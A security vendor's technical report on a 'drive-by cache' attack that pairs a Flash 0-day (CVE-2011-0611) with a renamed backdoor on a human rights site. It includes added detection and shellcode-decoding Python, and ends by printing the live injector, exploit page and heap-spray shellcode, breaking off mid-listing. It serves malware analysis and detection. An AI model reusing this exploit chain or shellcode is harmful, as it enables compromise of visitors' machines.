Newest Adobe flash 0-day used in new drive-by download variation: drive-by cache, targets human rights website

(Credits: Chris Hsiao, NightCola Lin, Wayne Huang)
Armorize runs one of the world's largest cloud-based Web malware scanning services, OEM'd to large security and hosting companies. Recently we've noticed increasing use of a variation of the drive-by download attack, usually coupled with 0-days. This is our technical report on the subject.

We realize that in recent years "interesting" threat names have been coined regularly, for example the popular [cross-X Y-ing] convention, where X can be as big as "cloud". Nevertheless we feel this method needs a unique name; we'll dub it Drive-By Cache. Here's a summary of this report:

A. The method of attack is a variation of the drive-by download mechanism; we dub it "drive-by cache." This mechanism makes the infection harder to detect than drive-by download.
B. Here we use a recent example reported by our scanners. The infected site is a human rights website, and the exploit itself targets the Adobe flash 0-day CVE-2011-0611, which Adobe patched yesterday. HackAlert first flagged this infection about a week ago, when no patch was available for this 0-day.
C. The installed malware connects back to 182.237.3.105, an IP in Hong Kong.

A fuller summary can be found in [5. Forensics Summary].

[Sections]
1. Brief overview of drive-by downloads
2. Drive by cache
3. Real-world example
4. Detection Rates
5. Forensics Summary
6. Complete codes

[1. Brief overview of drive-by downloads]

A drive-by download attack refers to a user visiting an infected page and subsequently having malware installed, without his/her knowledge and without having to click on or agree to anything. Our previous post on HDD spreading itself via malvertising is a typical example of this type of threat.

This type of threat has existed since around 2000, and became widespread as heap-spraying techniques matured around 2004. The term "drive-by download" did not gain a widely accepted, specific meaning until Google's 2007 "The Ghost in the Browser" paper (Provos et al.); before that it was used loosely for several web-based malware threats (drive-by downloads, click-by downloads, phishing, etc.). Since then, "drive-by download" has referred specifically to the type of Web malware threat described in the Ghost paper.

Below is a simplified illustration of this process; a more detailed description, with animation, can be found in our 2009 BlackHat / DEFCON drivesploit presentation pages 15-17.

In step 1, the victim visits an infected site into which some malicious javascript (or flash) has been injected. The injected javascript may create an iframe pointing to one or more hop points, or it may itself be the exploit; either way, what matters is that the browser ultimately loads an exploit, usually in the form of javascript or flash. In the example used here, it's an exploit for the Adobe flash 0-day CVE-2011-0611.

In step 2, the exploit runs inside the browser, exploits a vulnerability in it, and forces the browser to execute a small piece of machine code (the shellcode) that came with the exploit. The shellcode makes the browser process connect to another URL, often on a different domain from the infected one, fetch a piece of malware, write it to disk and execute it. This is step 3.

It is difficult for desktop antivirus technologies to detect drive-by downloads statically using signatures (patterns). Browser exploits usually exist in the form of scripts, for example javascripts or flash actionscripts. They can be randomly obfuscated on-the-fly as they are served to victims; refer to the drivesploit presentation for the many creative ways attackers obfuscate script-based exploits. Collecting signatures for these randomly obfuscated and therefore "disposable" javascripts not only does not increase detection rates, it explodes one's signature database and causes detection speeds to drop (too many signatures to match against).

Behavior-based detection, on the other hand, is very effective for this type of threat. For drive-by downloads, the behavior is consistent and can be well defined. If we hook around the browser, the javascript engine, and various APIs, we will clearly see the following behavior, in sequential order:

A. Browser loads a URL (victim visits an infected site)
B. Exploit code executes and succeeds, so browser starts to execute shellcode that came with the exploit
C. Browser calls URLDownloadToFile() of urlmon.dll, which downloads some file from some URL and writes to disk as some file.
D. Browser executes the created file

Browser exploits love to call URLDownloadToFile(); for example, of the 8 drive-by download shellcodes listed on exploit-db at the time of writing, all use URLDownloadToFile() for step (C).

But a browser rendering a page does not normally call URLDownloadToFile() itself, so a call to this API from the browser process is a good trigger point for behavior-based Web malware detection.

Generally speaking, to bypass behavior-based detection, shellcodes need to do as little as possible, and act as similar to the browser (call similar APIs) as possible. The simplest way to achieve this, is to have the browser do most of the work for the shellcode.

[2. Drive-by cache]

And drive-by caching does exactly this. In drive-by caching, a shellcode doesn't do Step (C). After being executed, it doesn't make an attempt to download a file and write it to disk. Instead, it locates the malware which is already sitting in the browser's cache directory, and executes it.

And that's why we take out the word download and dub it drive-by cache.

But how did the malware binary make its way into the browser's cache, BEFORE the exploit was executed? See illustration below:

For typical drive-by downloads, the process is:

(1) Browser load URL
(2) Browser executes exploit code
(3) Browser executes shellcode
(4) Shellcode downloads malware to disk
(5) Shellcode executes malware

In drive-by cache, step (4) is now performed right after step (1) and before step (2). It's also performed by the browser and not the shellcode. How is this done?

It's very simple. The malware binary is renamed to look like an image or script (.jpg, .js, here .jp2) and referenced from the infected page. In the recent infection we use as our example, the code is:
<script src=newsvine.jp2>

This line tells the browser to include "newsvine.jp2" as javascript. The browser therefore a) retrieves the file, b) writes it to its cache, and c) tries to execute it as javascript. Step (c) fails, since newsvine.jp2 is a PE binary (the malware), and the exploit page installs a window.onerror handler that returns true so the resulting script error is never shown. By then, though, the file has been fetched by the browser and written to the cache directory.
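A scanner can catch this trick statically, before any exploit runs, by fetching every <script src> and checking what the bytes actually are rather than trusting the extension or Content-Type. The following Python is an added example (ours, not the report's or Armorize's tooling) run over a constructed copy of the exploit markup, with an invented host hop.example and a stand-in PE body in place of a real fetch; it resolves each script URL, sniffs the body's magic bytes, and reports any script whose body is a PE, SWF, image or other non-text file.

```python
import posixpath
import re
from urllib.parse import urljoin, urlparse

# <script ... src=VALUE> with double-quoted, single-quoted or bare values
SCRIPT_SRC = re.compile(
    r"<script\b[^>]*?\bsrc\s*=\s*(?:\"([^\"]*)\"|'([^']*)'|([^\s>]+))", re.I)

# Leading bytes that identify content no <script> should ever point at
MAGIC = [
    (b"MZ", "pe"),
    (b"\x7fELF", "elf"),
    (b"FWS", "swf"), (b"CWS", "swf"), (b"ZWS", "swf"),
    (b"%PDF", "pdf"),
    (b"PK\x03\x04", "zip"),
    (b"\xff\xd8\xff", "jpeg"),
    (b"\x00\x00\x00\x0cjP  ", "jp2"),
]

def sniff(body):
    """Classify a response body by its first bytes, ignoring extension and headers."""
    for magic, label in MAGIC:
        if body.startswith(magic):
            return label
    try:
        body.decode("utf-8")
    except UnicodeDecodeError:
        return "binary"
    return "text"

def script_sources(page_url, html):
    """Absolute URLs of every <script src> on the page, in document order."""
    urls = []
    for m in SCRIPT_SRC.finditer(html):
        src = next(g for g in m.groups() if g is not None)
        urls.append(urljoin(page_url, src))
    return urls

def audit_script_sources(page_url, html, fetch):
    """fetch(url) -> bytes or None. Returns one finding per script whose body is not text."""
    findings = []
    for url in script_sources(page_url, html):
        ext = posixpath.splitext(urlparse(url).path)[1].lower()
        body = fetch(url)
        if body is None:
            continue
        kind = sniff(body)
        if kind != "text":
            findings.append({"url": url, "ext": ext, "kind": kind})
    return findings

# Constructed page: the markup the exploit writes into the document, on an invented host.
PAGE_URL = "http://hop.example/dir/AI/exploit.html"
PAGE_HTML = """<script type="text/javascript">window.onerror=function(){return true;};</script>
<script src=newsvine.jp2></script>
<script src="/includes/googlead.js"></script>
<object width="550" height="400"><param name="movie" value="done.swf"><embed src="display.swf"></embed></object>"""

# Constructed stand-ins for what an HTTP fetch would return (not the real files):
# a PE header stub for the renamed backdoor, plain javascript for the injector.
RESPONSES = {
    "http://hop.example/dir/AI/newsvine.jp2": b"MZ\x90\x00" + bytes(60) + b"PE\x00\x00",
    "http://hop.example/includes/googlead.js": b"if (document.cookie.indexOf('popad') == -1) { /* ... */ }",
}

def fetch_offline(url):
    return RESPONSES.get(url)

if __name__ == "__main__":
    for f in audit_script_sources(PAGE_URL, PAGE_HTML, fetch_offline):
        print("script src -> %(kind)s body: %(url)s (ext %(ext)s)" % f)
```

On the constructed page this flags only newsvine.jp2, as a script whose body starts with MZ; googlead.js passes because its body is text, even though its behaviour is malicious, which is why this check complements rather than replaces behavioral scanning. The same sniffing applies to <embed> and <object> sources if you extend the regex.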

Note that all of this is done by the browser, not the shellcode, and the browser fetches and caches the file through its ordinary networking and cache code paths rather than URLDownloadToFile().

To a behavior analysis engine, a) this is quite normal browser behavior, with no suspicious APIs being called, and b) it happens right after step (1) (see the illustration above), so it does not match the usual drive-by download behavior sequence.

And because of the above, compared to drive-by download, drive-by cache is more likely to bypass security detection mechanisms.
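To make the difference in observable behavior concrete, here is an added example (ours, not part of the original report or of HackAlert): a small Python classifier run over constructed hooked-API traces in an invented one-call-per-line format. The first rule is the URLDownloadToFile() trigger from section 1; the second fires when the browser process launches a file that it never fetched through URLDownloadToFile() and that sits in its own cache directory or carries a non-executable extension, which is what drive-by cache looks like from the outside. Hosts, paths and the trace format are assumptions.

```python
import ntpath

# APIs a sandbox hook reports as "process launched something"
EXEC_APIS = {"CreateProcessA", "CreateProcessW", "WinExec", "ShellExecuteA", "ShellExecuteW"}
# Path fragments of the IE cache (Temporary Internet Files\Content.IE5\<random>\name[1].ext)
CACHE_MARKERS = ("temporary internet files", "content.ie5")
EXEC_EXTENSIONS = {".exe", ".dll", ".scr", ".com", ".bat", ".cmd"}

def parse_trace(text):
    """One hooked call per line as 'API|arg1|arg2...' (constructed format, not a real sandbox's)."""
    calls = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        api, *args = line.split("|")
        calls.append((api, args))
    return calls

def _norm(path):
    return ntpath.normpath(path).lower()

def urldownload_rule(calls):
    """Classic drive-by download trigger: URLDownloadToFile(url, path) followed by an exec of path."""
    dropped, hits = {}, []
    for api, args in calls:
        if api == "URLDownloadToFile" and len(args) >= 2:
            dropped[_norm(args[1])] = args[0]
        elif api in EXEC_APIS and args and _norm(args[0]) in dropped:
            hits.append(("drive-by download", args[0], dropped[_norm(args[0])]))
    return hits

def cache_exec_rule(calls):
    """Drive-by cache trigger: the browser runs a file it never pulled through
    URLDownloadToFile, and that file lives in its own cache or has a non-executable
    extension. CreateProcess does not care about the extension, so a PE renamed
    to .jp2 still runs."""
    downloaded, hits = set(), []
    for api, args in calls:
        if api == "URLDownloadToFile" and len(args) >= 2:
            downloaded.add(_norm(args[1]))
        elif api in EXEC_APIS and args:
            path = _norm(args[0])
            in_cache = any(marker in path for marker in CACHE_MARKERS)
            odd_ext = ntpath.splitext(path)[1] not in EXEC_EXTENSIONS
            if path not in downloaded and (in_cache or odd_ext):
                hits.append(("drive-by cache", args[0]))
    return hits

def classify(trace_text):
    calls = parse_trace(trace_text)
    return urldownload_rule(calls) + cache_exec_rule(calls)

# Constructed traces (invented hosts and paths) in the format parse_trace() expects.
CLASSIC_TRACE = r"""
LoadUrl|http://infected.example/index.html
JsEval|<inline obfuscated script>
URLDownloadToFile|http://198.51.100.7/x.exe|C:\DOCUME~1\victim\LOCALS~1\Temp\a.exe
CreateProcessA|C:\DOCUME~1\victim\LOCALS~1\Temp\a.exe
"""
CACHE_TRACE = r"""
LoadUrl|http://hop.example/dir/AI/exploit.html
InternetReadFile|http://hop.example/dir/AI/newsvine.jp2
WriteFile|C:\DOCUME~1\victim\LOCALS~1\Temporary Internet Files\Content.IE5\K1ABCD2E\newsvine[1].jp2
JsEval|<script src=newsvine.jp2>
FindFirstFileA|C:\DOCUME~1\victim\LOCALS~1\Temporary Internet Files\Content.IE5\*\newsvine*
CreateProcessA|C:\DOCUME~1\victim\LOCALS~1\Temporary Internet Files\Content.IE5\K1ABCD2E\newsvine[1].jp2
"""
BENIGN_TRACE = r"""
LoadUrl|http://news.example/
InternetReadFile|http://news.example/logo.jpg
WriteFile|C:\DOCUME~1\victim\LOCALS~1\Temporary Internet Files\Content.IE5\K1ABCD2E\logo[1].jpg
"""

if __name__ == "__main__":
    for name, trace in (("classic", CLASSIC_TRACE), ("cache", CACHE_TRACE), ("benign", BENIGN_TRACE)):
        print(name, classify(trace))
```

Run it and the classic trace trips only the first rule while the cache trace trips only the second; a detector keyed solely on URLDownloadToFile() reports nothing for the cache trace, which is the evasion this section describes. The benign trace, where the browser writes to its cache but never executes anything, produces no finding, because the write itself is normal and only the later exec is the tell. Real hooks will see other exec variants and 8.3 paths; adjust EXEC_APIS and CACHE_MARKERS to the browser being monitored.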

[3. Real-world example]

At the time of this writing, this human rights website is still infected with this exploit, which combines a) drive-by cache and b) the recent Adobe flash 0-day CVE-2011-0611. HackAlert first detected the infection about a week ago and flagged its non-standard drive-by download behavior.

The infection can be found at the bottom of the html:
</div><script src="/includes/googlead.js"></script></body></html>

/includes/googlead.js creates a hidden iframe to the malicious host, at most once a day per visitor:
if (document.cookie.indexOf('popad') == -1) {
    // gate on a "popad" cookie that expires at the next midnight, so a
    // visitor (or a scanner) is sent to the exploit page only once a day
    var e = new Date();
    e.setDate(e.getDate() + 1);
    e.setHours(0, 0, 0);
    e.setTime(e.getTime());
    document.cookie = 'popad=true;path=/;expires=' + e.toGMTString();
    // 468x60 iframe positioned far off-screen, pointing at the exploit page
    document.write("<iframe frameborder=0 style='position: absolute; top:-9999px;left:-9999px' src='http://71.6.217.131/dir/AI/exploit.html' width=468 height=60 scrolling=no></iframe>");
}

The exploit (which is still live right now) is served from http://71.6.217.131/dir/AI/exploit.html. Full content of this exploit is listed at the bottom of this report. Here's one of the important sections:
var display="<script type=\"text/javascript\">window.onerror=function(){return true;};<\/script>\r\n"+"<script src=newsvine.jp2><\/script>\r\n"+
"<object width=\"550\" height=\"400\">\r\n"+
"<param name=\"movie\" value=\"done.swf\">\r\n"+
"<embed src=\"display.swf\" width=\"550\" height=\"400\">\r\n"+
"<\/embed>\r\n"+
"<\/object>"

Which writes out:
<script type="text/javascript">
window.onerror=function(){return true;};
</script>

<script src=newsvine.jp2></script>

<object width="550" height="400">
<param name="movie" value="done.swf">
<embed src="display.swf" width="550" height="400"></embed>
</object>

"display.swf" is the flash swf file containing the actual exploit code, written in flash ActionScript. A full decoded version of the code can be found at the bottom of this report. <script src=newsvine.jp2></script> does the drive-by caching. newsvine.jp2's original name is swf.exe; it is a backdoor written in VB, possibly of the Pincav family. Here it is renamed to newsvine.jp2, and its URL is placed in a <script> tag. Processing this tag, the victim's browser downloads newsvine.jp2 and writes it to the cache directory.

Subsequently, display.swf is downloaded by the browser, and the ActionScript it contains is executed. The script exploits the CVE-2011-0611 Adobe Flash 0-day, and causes the shellcode to execute. The shellcode looks in the browser's cache directory for newsvine.jp2 and executes it.

Newsvine.jp2 (or swf.exe) connects back to CNC server at jeentern.dyndns.org:80, which resolves to 182.237.3.105 at the time of this writing.
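The shellcode itself can be recovered from the listing in section 6. The Python below is an added analysis example (ours, not part of the report): it takes the 171 writeInt() arguments from frame1() of the first decoded class (package ie_fla), reassembles them in the order a big-endian ByteArray writes them, locates the XOR decoder stub at the head of the block, checks that the stub's CALL/POP getpc pair is consistent with the length it loops over, and strips the encoding. The helper at the end restates what the spray loops in that listing allocate. The integers are copied from the page; the interpretation of the stub (key, length, getpc layout) is ours.

```python
import re
import struct

# The writeInt() arguments from ie_fla.MainTimeline.frame1() in section 6, in order.
IE_FLA_WRITEINTS = [
    2425393296, 2425393296, 3326443264, 1620086928, 3943717707, 868837049, 2231533620, 199418618,
    3943033067, 4294967051, 3118523106, 3184599686, 1137894114, 3798573806, 1772287593, 3798590057,
    2331142421, 2296888074, 350479074, 1912609418, 3520127714, 2327286151, 2427873764, 179692514,
    3798534792, 3820685877, 3823297024, 462065361, 3504507537, 2324139702, 1776552667, 3823297129,
    176743355, 173794274, 3791657833, 912330422, 1763576316, 3138065634, 3806509067, 534962914,
    3112755848, 3803426993, 2296520116, 4195031010, 3806464575, 488447361, 2407976071,
    2592588493, 2713887917, 2965556656, 3267413943, 2980556978, 2964169899, 2930231230, 2928509315,
    2395124103, 2526448524, 2240921270, 2274333325, 2424541339, 3266022550, 2274397319, 2529338507,
    2391249342, 3233990539, 3266030786, 3398207381, 2442431372, 2278083720, 2463157186, 2796405450,
    3397488518, 3431438983, 3267415425, 3263596430, 3268252098, 3348531087, 2462563985, 2491517581,
    2442579079, 2592588484, 3301081485, 2459681472, 3347824834, 3348531087, 2462563985, 2491517581,
    2442579079, 2592588493, 2613232836, 3263270790, 3431438983, 3268248002, 2442560400, 2529347478,
    2274333383, 3197211777, 2324533654, 3431438983, 3234581474, 182918429, 495030150, 3431438983,
    3792313372, 488476050, 2274157153, 646349673, 1030350534, 1629941345, 183835906, 1658456726,
    3898792459, 2531746522, 160953187, 2598859378, 1920112362,
    1763555177, 242197223, 486673117, 3806519841, 1658456726, 3898792459, 2531746522, 160953187,
    2598859378, 1920112130, 2330650850, 3798967015, 486673141, 3806519841, 183755490, 3797611491,
    3865190638, 3792298170, 554310429, 488487204, 3847908285, 3817088421, 3877437985, 2976464561,
    2292353762, 4074955445, 1772416522, 2585599261, 3122770868, 1771560553, 2529991393, 397699476,
    3269531601, 732668751, 3777483065, 3982291672, 882305571, 702931256, 2718503897, 4254533052,
    1773979361, 1065642478, 2842279166, 3779029478, 1776363337, 3166380298, 1109335325, 3499521006,
    1732070745, 2171286445, 4232480269, 3045388061, 2062086682, 3123304899, 3806520034,
]

def bytes_from_writeints(values, big_endian=True):
    """Rebuild the ByteArray the SWF fills. AS3 ByteArray.endian defaults to BIG_ENDIAN
    and ie_fla never changes it on this.s, so each uint lands MSB first: 0x90909090
    is four NOPs and 0x33C966B9 is "xor ecx,ecx / mov cx,..." in that order."""
    fmt = ">I" if big_endian else "<I"
    return b"".join(struct.pack(fmt, v) for v in values)

# Decoder stub we look for at the head of the block (our reading of the bytes):
#   33 C9           xor ecx, ecx
#   66 B9 ll ll     mov cx, <encoded length>
#   80 34 0B kk     xor byte [ebx+ecx], <key>
#   E2 FA           loop
#   EB 05           jmp short over the CALL into the decoded payload
#   E8 rr rr rr rr  call back to "5B 4B" (pop ebx / dec ebx), the getpc that sets EBX
DECODER = re.compile(rb"\x33\xc9\x66\xb9(..)\x80\x34\x0b(.)\xe2\xfa\xeb\x05\xe8(....)", re.S)

def find_xor_decoder(blob):
    m = DECODER.search(blob)
    if m is None:
        return None
    length = struct.unpack("<H", m.group(1))[0]
    key = m.group(2)[0]
    call_rel = struct.unpack("<i", m.group(3))[0]
    payload = m.end()                      # first byte after the CALL = start of encoded payload
    pop_ebx = m.start() - 2                # "5B 4B" must immediately precede xor ecx,ecx
    if payload + call_rel != pop_ebx or blob[pop_ebx:pop_ebx + 2] != b"\x5b\x4b":
        return None                        # not the getpc layout this stub relies on
    return {"key": key, "length": length, "payload": payload}

def decode_payload(blob):
    d = find_xor_decoder(blob)
    if d is None:
        raise ValueError("no recognised XOR decoder stub")
    enc = blob[d["payload"]:d["payload"] + d["length"]]
    if len(enc) != d["length"]:
        raise ValueError("block shorter than the length the decoder loops over")
    return bytes(b ^ d["key"] for b in enc)

def spray_geometry(shellcode_len, slide_unit=1024, slide_reps=1023, copies=176):
    """What frame1() allocates: s3 = 1024 x 0x0D, s = 1023 x s3 + shellcode, 176 copies of s.
    0x0D is the classic Flash/IE spray byte: "0D xx xx xx xx" is OR EAX,imm32, so control
    landing anywhere in the slide executes harmlessly until it reaches the shellcode."""
    block = slide_unit * slide_reps + shellcode_len
    return {"block_bytes": block, "total_bytes": block * copies}

if __name__ == "__main__":
    blob = bytes_from_writeints(IE_FLA_WRITEINTS)
    print("spray block: %d bytes, decoder: %s" % (len(blob), find_xor_decoder(blob)))
    print("decoded payload head:", decode_payload(blob)[:8].hex())
    print(spray_geometry(len(blob)))
```

Decoding gives a 645-byte payload behind key 0xE2 whose first instruction is a five-byte jmp forward, and the block is 684 bytes: 39 bytes of stub plus exactly the length the decoder loops over, a handy consistency check when transcribing. Disassemble the result to confirm what it does; this report states only the observed behavior (locate newsvine.jp2 in the cache and execute it).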

[4. Detection Rates]

The exploit code is in flash ActionScript and is located within swf files. Because this isn't the traditional drive-by download shellcode, but rather drive-by cache, detection rate seems low. When we submitted the swf file to VirusTotal, 0 out of 42 antivirus vendors detected this exploit.

As for newsvine.jp2 (swf.exe), we got 1/42 on VirusTotal; only Microsoft detected this backdoor.



[5. Forensics Summary]

Here's what we know so far:

1. The human rights website has been infected (in multiple pages) for at least a week, and is still infected right now.
2. Drive-by cache is used instead of drive-by download.
3. The exploit targets the CVE-2011-0611 Adobe Flash 0-day.
4. VirusTotal detection was 0 out of 42 for the swf exploits, and 1 out of 42 for the malware.
5. The exploit is served by http://71.6.217.131/dir/AI/exploit.html, which we believe is a compromised server in San Diego, hosted by Cari.Net.
6. newsvine.jp2, originally swf.exe, is drive-by cached and then executed by the shellcode. It is a backdoor written in VB, possibly of the Pincav family. It carries an invalid digital signature pretending to be the Xunlei download manager, which Xunlei claims to be the world's most widely used download manager. Strings within the binary suggest the author goes by "chuang" or "zchuang".
7. newsvine.jp2 connects back to the C&C server at jeentern.dyndns.org:80, which resolves to 182.237.3.105, an IP in Hong Kong.

[6. Complete codes]

Below we include full exploit codes to this drive-by cache example. If you need anything else, please email Xwayne@armorize.comX (delete the two enclosing X's).

1. http://71.6.217.131/dir/AI/exploit.html:

<html>
<head>
<script type="text/javascript">
// Generic cookie helpers, used below to count visits per victim
function getCookieVal(offset) {
    var endstr = document.cookie.indexOf(";", offset);
    if (endstr == -1) {
        endstr = document.cookie.length;
    }
    return unescape(document.cookie.substring(offset, endstr));
}

function GetCookie(name) {
    var arg = name + "=";
    var alen = arg.length;
    var clen = document.cookie.length;
    var i = 0;
    while (i < clen) {
        var j = i + alen;
        if (document.cookie.substring(i, j) == arg) return getCookieVal(j);
        i = document.cookie.indexOf(" ", i) + 1;
        if (i == 0) break;
    }
    return null;
}

function SetCookie(name, value) {
    var argv = SetCookie.arguments;
    var argc = SetCookie.arguments.length;
    var expires = (2 < argc) ? argv[2] : null;
    var path = (3 < argc) ? argv[3] : null;
    var domain = (4 < argc) ? argv[4] : null;
    var secure = (5 < argc) ? argv[5] : false;
    document.cookie = name + "=" + escape(value) + ((expires == null) ? "" : ("; expires=" + expires.toGMTString())) + ((path == null) ? "" : ("; path=" + path)) + ((domain == null) ? "" : ("; domain=" + domain)) + ((secure == true) ? "; secure" : "");
}

// Visit counter kept in the "vis1t" cookie, expiring 24 hours after the last visit
function DisplayInfo() {
    var expdate = new Date();
    var visit;
    expdate.setTime(expdate.getTime() + (24 * 60 * 60 * 1000));
    if (!(visit = GetCookie("vis1t"))) visit = 0;
    visit++;
    SetCookie("vis1t", visit, expdate, "/", null, false);
    return visit;
}

// Serve the exploit only on a victim's first two visits; later visits
// (for example an analyst returning to the page) get an empty body
function code() {
    var num = DisplayInfo();
    if (num < 3) {
        return 1;
    } else {
        return 0;
    }
}

function user() {
    // Each variant first pulls newsvine.jp2 (the renamed backdoor) through a <script>
    // tag so the browser caches it, with window.onerror swallowing the script error,
    // and then loads the SWF carrying the CVE-2011-0611 exploit.
    // IE8 on Windows XP: March.swf, plus an <object> whose classID points at yg.dll
    var weekDay = "<script type=\"text/javascript\">window.onerror=function(){return true;};<\/script>\r\n" +
        "<script src=newsvine.jp2><\/script>\r\n" +
        "<object classID=yg.dll#yg.e><\/object>\r\n" +
        "<object width=\"550\" height=\"400\">\r\n" +
        "<param name=\"movie\" value=\"done.swf\">\r\n" +
        "<embed src=\"March.swf\" width=\"550\" height=\"400\">\r\n" +
        "<\/embed>\r\n" +
        "<\/object>";
    // IE6 or IE7 on Windows XP: display.swf
    var display = "<script type=\"text/javascript\">window.onerror=function(){return true;};<\/script>\r\n" +
        "<script src=newsvine.jp2><\/script>\r\n" +
        "<object width=\"550\" height=\"400\">\r\n" +
        "<param name=\"movie\" value=\"done.swf\">\r\n" +
        "<embed src=\"display.swf\" width=\"550\" height=\"400\">\r\n" +
        "<\/embed>\r\n" +
        "<\/object>";
    // IE8 on Windows 7: Birthday.swf, plus the yg.dll <object>
    var Example = "<script type=\"text/javascript\">window.onerror=function(){return true;};<\/script>\r\n" +
        "<script src=newsvine.jp2><\/script>\r\n" +
        "<object classID=yg.dll#yg.e><\/object>\r\n" +
        "<object width=\"550\" height=\"400\">\r\n" +
        "<param name=\"movie\" value=\"done.swf\">\r\n" +
        "<embed src=\"Birthday.swf\" width=\"550\" height=\"400\">\r\n" +
        "<\/embed>\r\n" +
        "<\/object>";
    // Browser and OS fingerprinting from the user agent string
    var info = navigator.userAgent.toLowerCase();
    var win = (navigator.platform == "Win32") || (navigator.platform == "Windows"); // computed but never used
    var ck = code();
    var January = info.indexOf('msie 8.0');
    var February = info.indexOf('msie 7.0');
    var April = info.indexOf('msie 6.0');
    var June = info.indexOf("windows nt 5.1");   // Windows XP
    var August = info.indexOf("windows nt 6.1"); // Windows 7
    if (January > 0 && June > 0 && ck == 1) {                 // IE8 on XP
        document.body.innerHTML = "xxxx" + weekDay;
    }
    if (June > 0 && ck == 1 && (February > 0 || April > 0)) { // IE7 or IE6 on XP
        document.body.innerHTML = "xxxx" + display;
    }
    if (January > 0 && August > 0 && ck == 1) {               // IE8 on Windows 7
        document.body.innerHTML = "xxxx" + Example;
    }
}
</script>
</head>
<body onload=user()>
</body>
</html>


2. Exploit in ActionScript, decoded from the swf files:

package ie_fla {
import flash.display. * ;
import flash.utils. * ;

dynamic public class MainTimeline extends MovieClip {
public
var s: Object;
public
var s2: Object;
public
var s3: Object;
public
var a: Object;
public
var t: Object;
public
var i: Object;
public
var r: ByteArray;
public
var ldr: Loader;

public

function MainTimeline() {
addFrameScript(0, this.frame1);
return;
} // end function
public

function hexToBin(param1: String): ByteArray {
var _loc_2: String;
var _loc_3: * = new ByteArray();
var _loc_4: * = param1.length;
var _loc_5: uint;
_loc_3.endian = Endian.LITTLE_ENDIAN;
while (_loc_5 < _loc_4) { // label
    _loc_2 = param1.charAt(_loc_5) + param1.charAt(_loc_5 + 1);
    _loc_3.writeByte(parseInt(_loc_2, 16));
    _loc_5 = _loc_5 + 2;
} // end while
return _loc_3;
} // end function

function frame1() {
this.s = new ByteArray();
this.s3 = new ByteArray();
this.a = new Array();
// hex string decoded by hexToBin() and handed to Loader.loadBytes() below
this.t = "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";
this.i = 0;
// s3: a 1024-byte slide of 0x0D bytes
while (this.i < 1024) { // label
    this.s3.writeByte(13);
    var _loc_1: String;
    _loc_1.i = this.i++;
} // end while
this.i = 0;
// s: 1023 copies of the slide (about 1 MB), followed by the shellcode
while (this.i < 1023) { // label
    this.s.writeBytes(this.s3, 0, this.s3.length);
    var _loc_1: String;
    _loc_1.i = this.i++;
} // end while
// shellcode, written as 32-bit ints (ByteArray default endianness is big-endian)
this.s.writeInt(2425393296); this.s.writeInt(2425393296); this.s.writeInt(3326443264); this.s.writeInt(1620086928); this.s.writeInt(3943717707); this.s.writeInt(868837049); this.s.writeInt(2231533620); this.s.writeInt(199418618); this.s.writeInt(3943033067); this.s.writeInt(4294967051); this.s.writeInt(3118523106); this.s.writeInt(3184599686); this.s.writeInt(1137894114); this.s.writeInt(3798573806); this.s.writeInt(1772287593); this.s.writeInt(3798590057); this.s.writeInt(2331142421); this.s.writeInt(2296888074); this.s.writeInt(350479074); this.s.writeInt(1912609418); this.s.writeInt(3520127714); this.s.writeInt(2327286151); this.s.writeInt(2427873764); this.s.writeInt(179692514); this.s.writeInt(3798534792); this.s.writeInt(3820685877); this.s.writeInt(3823297024); this.s.writeInt(462065361); this.s.writeInt(3504507537); this.s.writeInt(2324139702); this.s.writeInt(1776552667); this.s.writeInt(3823297129); this.s.writeInt(176743355); this.s.writeInt(173794274); this.s.writeInt(3791657833); this.s.writeInt(912330422); this.s.writeInt(1763576316); this.s.writeInt(3138065634); this.s.writeInt(3806509067); this.s.writeInt(534962914); this.s.writeInt(3112755848); this.s.writeInt(3803426993); this.s.writeInt(2296520116); this.s.writeInt(4195031010); this.s.writeInt(3806464575); this.s.writeInt(488447361); this.s.writeInt(2407976071);
this.s.writeInt(2592588493); this.s.writeInt(2713887917); this.s.writeInt(2965556656); this.s.writeInt(3267413943); this.s.writeInt(2980556978); this.s.writeInt(2964169899); this.s.writeInt(2930231230); this.s.writeInt(2928509315); this.s.writeInt(2395124103); this.s.writeInt(2526448524); this.s.writeInt(2240921270); this.s.writeInt(2274333325); this.s.writeInt(2424541339); this.s.writeInt(3266022550); this.s.writeInt(2274397319); this.s.writeInt(2529338507); this.s.writeInt(2391249342); this.s.writeInt(3233990539); this.s.writeInt(3266030786); this.s.writeInt(3398207381); this.s.writeInt(2442431372); this.s.writeInt(2278083720); this.s.writeInt(2463157186); this.s.writeInt(2796405450); this.s.writeInt(3397488518); this.s.writeInt(3431438983); this.s.writeInt(3267415425); this.s.writeInt(3263596430); this.s.writeInt(3268252098); this.s.writeInt(3348531087); this.s.writeInt(2462563985); this.s.writeInt(2491517581); this.s.writeInt(2442579079); this.s.writeInt(2592588484); this.s.writeInt(3301081485); this.s.writeInt(2459681472); this.s.writeInt(3347824834); this.s.writeInt(3348531087); this.s.writeInt(2462563985); this.s.writeInt(2491517581); this.s.writeInt(2442579079); this.s.writeInt(2592588493); this.s.writeInt(2613232836); this.s.writeInt(3263270790); this.s.writeInt(3431438983); this.s.writeInt(3268248002); this.s.writeInt(2442560400); this.s.writeInt(2529347478); this.s.writeInt(2274333383); this.s.writeInt(3197211777); this.s.writeInt(2324533654); this.s.writeInt(3431438983); this.s.writeInt(3234581474); this.s.writeInt(182918429); this.s.writeInt(495030150); this.s.writeInt(3431438983); this.s.writeInt(3792313372); this.s.writeInt(488476050); this.s.writeInt(2274157153); this.s.writeInt(646349673); this.s.writeInt(1030350534); this.s.writeInt(1629941345); this.s.writeInt(183835906); this.s.writeInt(1658456726); this.s.writeInt(3898792459); this.s.writeInt(2531746522); this.s.writeInt(160953187); this.s.writeInt(2598859378); this.s.writeInt(1920112362); 
